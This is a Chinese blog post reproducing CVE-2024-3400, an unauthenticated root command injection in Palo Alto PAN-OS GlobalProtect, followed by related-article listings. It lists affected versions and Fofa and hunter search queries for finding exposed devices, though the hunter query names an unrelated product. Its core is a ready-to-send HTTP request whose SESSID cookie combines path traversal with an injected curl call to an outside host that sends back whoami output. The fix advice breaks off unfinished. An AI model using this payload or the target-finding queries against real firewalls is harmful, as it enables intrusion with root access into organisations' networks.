【漏洞复现】Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞(CVE-2024-3400)

已于 2024-04-21 21:14:51 修改
阅读量1k 收藏 3
点赞数 9
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-04-19 17:04:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/137971228
版权
本文报道了PaloAltoNetworks的PAN-OS系统中的命令注入漏洞,影响多个版本,攻击者可利用此漏洞获取ROOT权限执行任意命令。资产测绘和Fofa语句提供复现方法,推荐更新至特定版本进行修复。
摘要由CSDN通过智能技术生成

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

Palo Alto Networks PAN-OS是一套专为其下一代防火墙 (NGFW) 产品开发的操作系统,提供了全面的网络安全功能,包括威胁防护,网络分段,远程访问等;GlobalProtect是Palo Alto Networks一套远程访问 VPN 解决方案,集成于PAN-OS系统中。GlobalProtect 命令注入漏洞情报。未经身份验证的攻击者可以利用该漏洞以ROOT权限执行任意命令。

影响范围

	
version < 11.0.4-h1
version < 10.2.9-h1
version < 10.2.8-h3
version < 10.2.7-h8
version < 10.2.6-h3
version < 11.1.0-h3
version < 11.1.2-h3
version < 11.0.2-h4
version < 11.0.3-h10

资产测绘

hunter语句:

web.body="PaperCut"

Fofa语句

icon_hash="-631559155"

image

漏洞复现

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/y`curl${IFS}http://utkmwudrkm.dgrh3.cn?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

cookie

/opt/panlogs/tmp/device_telemetry/hour/
/opt/panlogs/tmp/device_telemetry/day/
/opt/panlogs/tmp/device_telemetry/minute/
/opt/panlogs/tmp/device_telemetry/hour/

image

image

修复建议

1、该漏洞已在 PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3 以及更高版本的

Nday_Seeker
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞 CVE-2024-3400
失心少年
04-25 259
在特定PAN-OS版本和不同功能配置下,未经身份验证的攻击者可能利用此漏洞在防火墙上以root权限执行任意代码。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!poc如下,注入点在Cookie中,将其中的DNSlog地址替换为你的dnslog地址,借助DNSLOG来复现,可以使用http://dnslog.pw/
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 7331
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_84264010的博客
05-08 1080
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2024-3400 PAN-OS:Palo Alto Networks PAN-OS GlobalProtect 功能中一个非常严重的零日漏洞
par@ish的博客
04-15 1735
该问题已在PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3等热修复版本中得到解决,并且在所有后续的PAN-OS版本中也已解决。关于即将发布的热修复程序的具体预计到达时间,请参阅下面的详细信息。在Palo Alto Networks PAN-OS软件的GlobalProtect功能中,针对特定PAN-OS版本及其特定配置特征存在一个命令注入漏洞,这可能允许未经身份验证的攻击者在防火墙上以root权限执行任意代码。
Windows Print Spooler服务最新漏洞CVE-2024-34527详解
m0_61043185的博客
04-12 342
据Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)在最初公开的exp README里描述,spooler的漏洞最初用于10年前的震网(Stuxnet)攻击,10年间spooler模块也被披露了许多漏洞,但不知是因为微软补丁修复的不彻底还是spooler模块本身实现起来的复杂性导致了CVE-2021-1675和CVE-2021-34527的出现。微软已于2021.7.7发布了一个紧急安全更新补丁,希望微软的这个补丁能使spooler更安全一些吧。
Palo Alto:注意!PAN-OS 防火墙 0day 漏洞已遭利用
smellycat000的专栏
04-15 300
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Palo Alto Networks 公司提醒称,PAN-OS 防火墙中存在一个严重的命令注入0day漏洞,且该漏洞已遭在野利用。Palo Alto Networks 公司发布安全公告称,“Palo Alto Networks 注意到数量有限的攻击正在利用该漏洞。”该漏洞由 Volexity 公司发现,编号为CVE-2024-3400,是一个命令...
Palo Alto PAN-OS 11.0
qq_33032009的博客
09-09 280
借助零延迟签名,网络中每个连接到 Internet 的 NGFW 都会在分析的个位数秒内更新 (sysin),确保第一个看到威胁的用户是唯一看到该威胁的用户。通过提供全面的产品组合,为不断发展中的合作伙伴生态系统赋能,在保护数以万计的企业云、网络和移动设备安全方面,我们始终站在最前沿。借助第一款引入内联深度学习(传统机器学习的子集)的新一代防火墙,您可以超越机器学习的结构化数据分析,并以人类的方式分析数据。​ 探索我们的产品系列,了解哪些解决方案最适合协同工作,为您的企业提供应有的全面保护。
PAN-OS 10.0 VM 下载,全球首个基于机器学习的新一代防火墙.rar
11-02
1. **PAN-OS**: PAN-OSPalo Alto Networks公司开发的一种操作系统,专为他们的下一代防火墙(NGFW)设计。它提供了全面的安全策略管理、应用控制、深度数据包检测以及威胁防护等功能。 2. **10.0 版本**: 这是...
Paloalto pan-os-admin guide v10.2
06-07
Paloalto pan-os-admin guide v10.2 .................................................................
ansible-pan:用于Palo Alto Networks NGFW的Ansible模块
01-31
Palo Alto NetworksPAN-OS Ansible模块以前是作为Ansible Galaxy角色分发的( )。 从Ansible 2.9开始,RedHat敦促开发人员迁移到collections以组织和分发其集成。 可以在以下位置找到新的收藏集: : 该集合的...
panos-scanner:确定远程GlobalProtect门户或管理界面的Palo Alto PAN-OS软件版本
05-08
确定远程GlobalProtect门户或管理界面的Palo Alto PAN-OS软件版本。 与开发 :red_heart: 由Bishop Fox 团队提供。 描述 帕洛阿尔托(Palo Alto)的GlobalProtect门户是PAN-OS的一项功能,它已成为的主题, 可能允许...
Linux系统(Ubuntu)如何使用GlobalProtect进行vpn连接(以 北邮 为例)
热门推荐
Ximerr的博客
09-12 2万+
GlobalProtect 是一种vpn软件,可以连接至 Palo Alto Networks 下一代防火墙上的 GlobalProtect 网关。目前不少高校都在使用 GlobalProtect 作为校外访问校内资源的主要途径。然而 GlobalProtect 只提供了 Windows 版本和 Mac 版本的安装包,均无法在 Linux 下运行。官网上显示 GlobalProtect 只...
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 569
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
大连理工大学GlobalProtect使用方法
Boumbo的博客
01-13 1万+
访问一下网址下载vpn软件 vpn下载器传送门 门户地址为: v.dlut.edu.cn 输入老师或者博士的校园门户账号密码即可连接vpn访问校内服务器
Palo Alto PAN-OS 10.1 for vSphere & KVM -- 基于机器学习的新一代防火墙
sysin | SYStem INside
07-06 709
Palo Alto Networks PAN-OS 10: World’s First ML-Powered NGFW.传统防火墙安全解决方案只能被动应对新的威胁。智能网络安全解决方案可以保持对攻击者的技术优势 (sysin),提高您的
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Crypto_30_vHsm_Types.h
最新发布
07-09
Crypto_30_vHsm_Types
palo alto vm 7.1.0
11-04
Palo Alto VM是由Palo Alto Networks公司开发的虚拟化防火墙解决方案之一,版本号为7.1.0。 Palo Alto VM 7.1.0 是该系列产品的一个版本,引入了一些新功能和改进。它是正在进行的持续创新的结果,以满足不断发展的网络安全需求。 在Palo Alto VM 7.1.0中,引入了一些重要的功能。首先,它加强了网络安全的能力。该版本中的漏洞修补程序和更新功能增强了系统的安全性,确保安全策略以及阻止网络攻击的有效性。 此外,这个版本还引入了更高级的流量分析和报告功能。用户可以获得更深入的流量分析结果和报告,以便更好地了解和解决网络中的问题。 此外,Palo Alto VM 7.1.0 还提供了更多的可配置选项,以满足企业不同需求。用户可以根据自己的网络环境和安全策略进行定制配置,以达到最佳的网络安全保护。 总之,Palo Alto VM 7.1.0是Palo Alto Networks公司的最新一代虚拟化防火墙解决方案之一。它以其强大的网络安全功能和灵活的配置选项,为企业提供了优秀的网络安全保护,帮助企业应对不断演变的网络威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值